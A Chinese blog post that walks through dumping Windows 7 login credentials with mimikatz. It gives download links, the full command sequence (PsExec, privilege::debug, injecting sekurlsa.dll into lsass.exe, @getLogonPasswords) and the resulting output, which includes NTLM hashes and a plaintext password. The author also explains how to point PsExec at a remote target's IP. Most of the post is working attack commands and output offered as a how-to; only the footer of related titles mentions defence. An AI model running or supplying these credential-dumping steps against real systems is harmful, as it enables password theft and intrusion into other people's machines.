用mimikatz来获取win7的密码
mimikatz下载地址:
http://www.webshell.cc/wp-content/uploads/2012/02/mimikatz_trunk.zip
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
blog.gentilkiwi.com应该是法国佬的博客。
用mimikatz来获取win7的密码:
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。C:\Users\Administrator>cd C:\mimikatz_trunk\toolsC:\mimikatz_trunk\tools>PsExec.exe \\127.0.0.1 cmd.exePsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.comMicrosoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。C:\Windows\system32>cd C:\mimikatz_trunk\Win32C:\mimikatz_trunk\Win32>mimikatz.exe mimikatz.exe
mimikatz 1.0 x86 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatzmimikatz # privilege::debug
Demande d'ACTIVATION du privil猫ge : SeDebugPrivilege : OKmimikatz # inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connect茅 脿 un client !
Message du processus :
Bienvenue dans un processus distantGentil KiwiSekurLSA : librairie de manipulation des donn茅es de s茅curit茅s dans LSASSmimikatz # @getLogonPasswordsAuthentification Id : 0;395889
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : WIN-S1J6267VPKLmsv1_0 : lm{ 7f6dc700e15e9f92aad3b435b51404ee }, ntlm{ 70829646e7
0fc9f291f87a41b9e158c5 }wdigest : yangtspkg : yangAuthentification Id : 0;155584
Package d'authentification : NTLM
Utilisateur principal : ANONYMOUS LOGON
Domaine d'authentification : NT AUTHORITYmsv1_0 : n.t. (LUID KO)wdigest : n.t. (LUID KO)tspkg : n.t. (LUID KO)Authentification Id : 0;75419
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : WIN-S1J6267VPKLmsv1_0 : lm{ 7f6dc700e15e9f92aad3b435b51404ee }, ntlm{ 70829646e7
0fc9f291f87a41b9e158c5 }wdigest : yangtspkg : yangAuthentification Id : 0;997
Package d'authentification : Negotiate
Utilisateur principal : LOCAL SERVICE
Domaine d'authentification : NT AUTHORITYmsv1_0 : n.t. (LUID KO)wdigest :tspkg : n.t. (LUID KO)Authentification Id : 0;996
Package d'authentification : Negotiate
Utilisateur principal : WIN-S1J6267VPKL$
Domaine d'authentification : WORKGROUPmsv1_0 : n.t. (LUID KO)wdigest :tspkg : n.t. (LUID KO)Authentification Id : 0;40847
Package d'authentification : NTLM
Utilisateur principal :
Domaine d'authentification :msv1_0 : n.t. (LUID KO)wdigest : n.t. (LUID KO)tspkg : n.t. (LUID KO)Authentification Id : 0;999
Package d'authentification : NTLM
Utilisateur principal : WIN-S1J6267VPKL$
Domaine d'authentification : WORKGROUPmsv1_0 : n.t. (LUID KO)wdigest :tspkg : n.t. (LUID KO)mimikatz # exit
Fermeture du canal de communicationC:\mimikatz_trunk\Win32>
wdigest后面的就是密码。如上所示,我的win7的Administrator的密码是yang。
工具的作者的blog:http://blog.gentilkiwi.com/mimikatz
解释:
privilege::debug //提升权限
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll" //注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
@getLogonPasswords //抓取密码
exit //退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环
另外,我测试的时候,是在win7上测试的。还可以在XP上来连接win7,只需要修改一下IP,例如:
PsExec.exe \\192.168.1.123 cmd.exe
把上面的192.168.1.123改为目标的IP。
用mimikatz来获取win7的密码相关推荐
- 【问题记录】防止mimikatz获取到明文密码
1. 打补丁KB2871997 2. 禁用Wdigest Auth 3. 删除用户凭证 搭靶机的时候想弄个通过哈希传递攻击的机器,但是上传mimikatz之后发现可以直接抓取到明文密码.主要是wdig ...
- mimakatz用法_两步完成利用procdump64+mimikatz获取win用户密码
使用procdump64+mimikatz可实现从内存中获取明文密码 工具 链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38 首先得 ...
- 获取Windows系统密码凭证 (゚益゚メ) 渗透测试
文章目录 Windows 加密简介 Windows 哈希过程 Windows 凭证获取 使用powershell脚本 Pwddump7 使用猕猴桃(mimikatz) 常用命令 本地非交互式凭证获取 ...
- 内网渗透之mimikatz+procdump 提取 Windows 明文密码
0x00 原理 获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码. 0x01 操作 Windows10/2012 以下的版本: 1.上传 procdump ...
- 修改服务器win7密码忘记,远程服务器win7改密码
远程服务器win7改密码 内容精选 换一换 代码迁移工具进行代码迁移时,需要调用Linux下的rpm.deb等命令才能完成扫描和迁移相关任务,这些命令和逻辑必须在后端Linux运行.插件只支持以Web ...
- 5.2.2 利用arp中间人攻击获取管理员账号密码
一.arp协议简述: ARP即地址解析协议,用于IP地址到MAC地址的映射,即由目标IP找到对应的MAC地址.ARP协议特点是"广播请求,单播回应". 二.arp欺骗原理:(看图, ...
- Win7开机密码破解
(只是为了遇到同样问题的朋友提供帮助,不要做有损于他人的事情!资料来自网络!) 方法一: 1. 进入pe 2.进入c:\windows\system32下 更改magnify.exe和cmd.exe的 ...
- sqlmap 获取mysql密码_利用sqlmap 获取管理员账号密码
首先,先简单介绍下sqlmap 简介: sqlmap是一种开源的 支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Ac ...
- 发现一个工具,可以清除 xp win7 用户密码,在PE下运行
发现一个工具,可以清除 xp win7 用户密码,在PE下运行 原版,不是这个,现在都是汉化版,加几个字. 真正的原版,早在几年前就有了.我不记得了. 以前没有这个习惯,写技术日记,记录下来. 现在开 ...
最新文章
- anaconda创建菜单失败
- ARP探测目标工具arping常用命令集合大学霸IT达人
- Prototype1.5.1源代码解读分析-1
- 程序员面试题精选100题(01)-把二元查找树转变成排序的双向链表[数据结构]
- Linux文件基本操作管理
- 2.3 KNN-采用机器学习库来预测鸢尾花的分类
- PyTorch1.0 教程 例子和书籍
- springsession分布式登录被覆盖_拉勾 分布式 学习小结
- 利用CloudIDE当做简单linux环境,执行简单python工程任务
- java 线程栈大小配置,JVM运行时数据区详解-Stack栈(优化配置、代码样例)
- 利用ggseqlogo绘制seqlogo图
- java考勤表导出_考勤表如何导出?
- ofo启示 | 创业企业为何大多熬不过五年?
- convertTo函数的用法
- 使用高德开放平台显示指定的坐标点和线
- Ubuntu虚拟机安装
- 在单机(物理机)上用虚拟机部署kubernetes集群
- 《深入理解Java虚拟机》第 3 版里面到底多了哪些知识点?本文竟然得到了本书作者的认可!
- 微前端架构实现(项目引入,消息总线,构建部署,监听服务)
- Matlab/Simulink中PMSM模型的反电动势系数和转矩系数
热门文章
- 信息系统项目管理师教程读书笔记(三)
- 3000xp7.32突然显示主数据库不存在的解决一例
- 冷原子量子计算机,量子计算新突破:在71个格点超冷原子量子模拟器中求解施温格方程...
- VirtuaNES.v0.97源码探究7 NES文件格式
- 30多个最受用的基于XML的Flash相册教程 -- Part II
- css3鼠标移出,CSS3:hover后鼠标移出animation
- 【iOS】对于iPhone5分辨率兼容性调整有关问题
- 眼镜计算机检查,每次拿到验光单都傻傻看不清楚?教你一分钟看明白
- 暗黑三的一些你需要注意的事情
- pandas用众数填充缺失值_数据处理之缺失值填充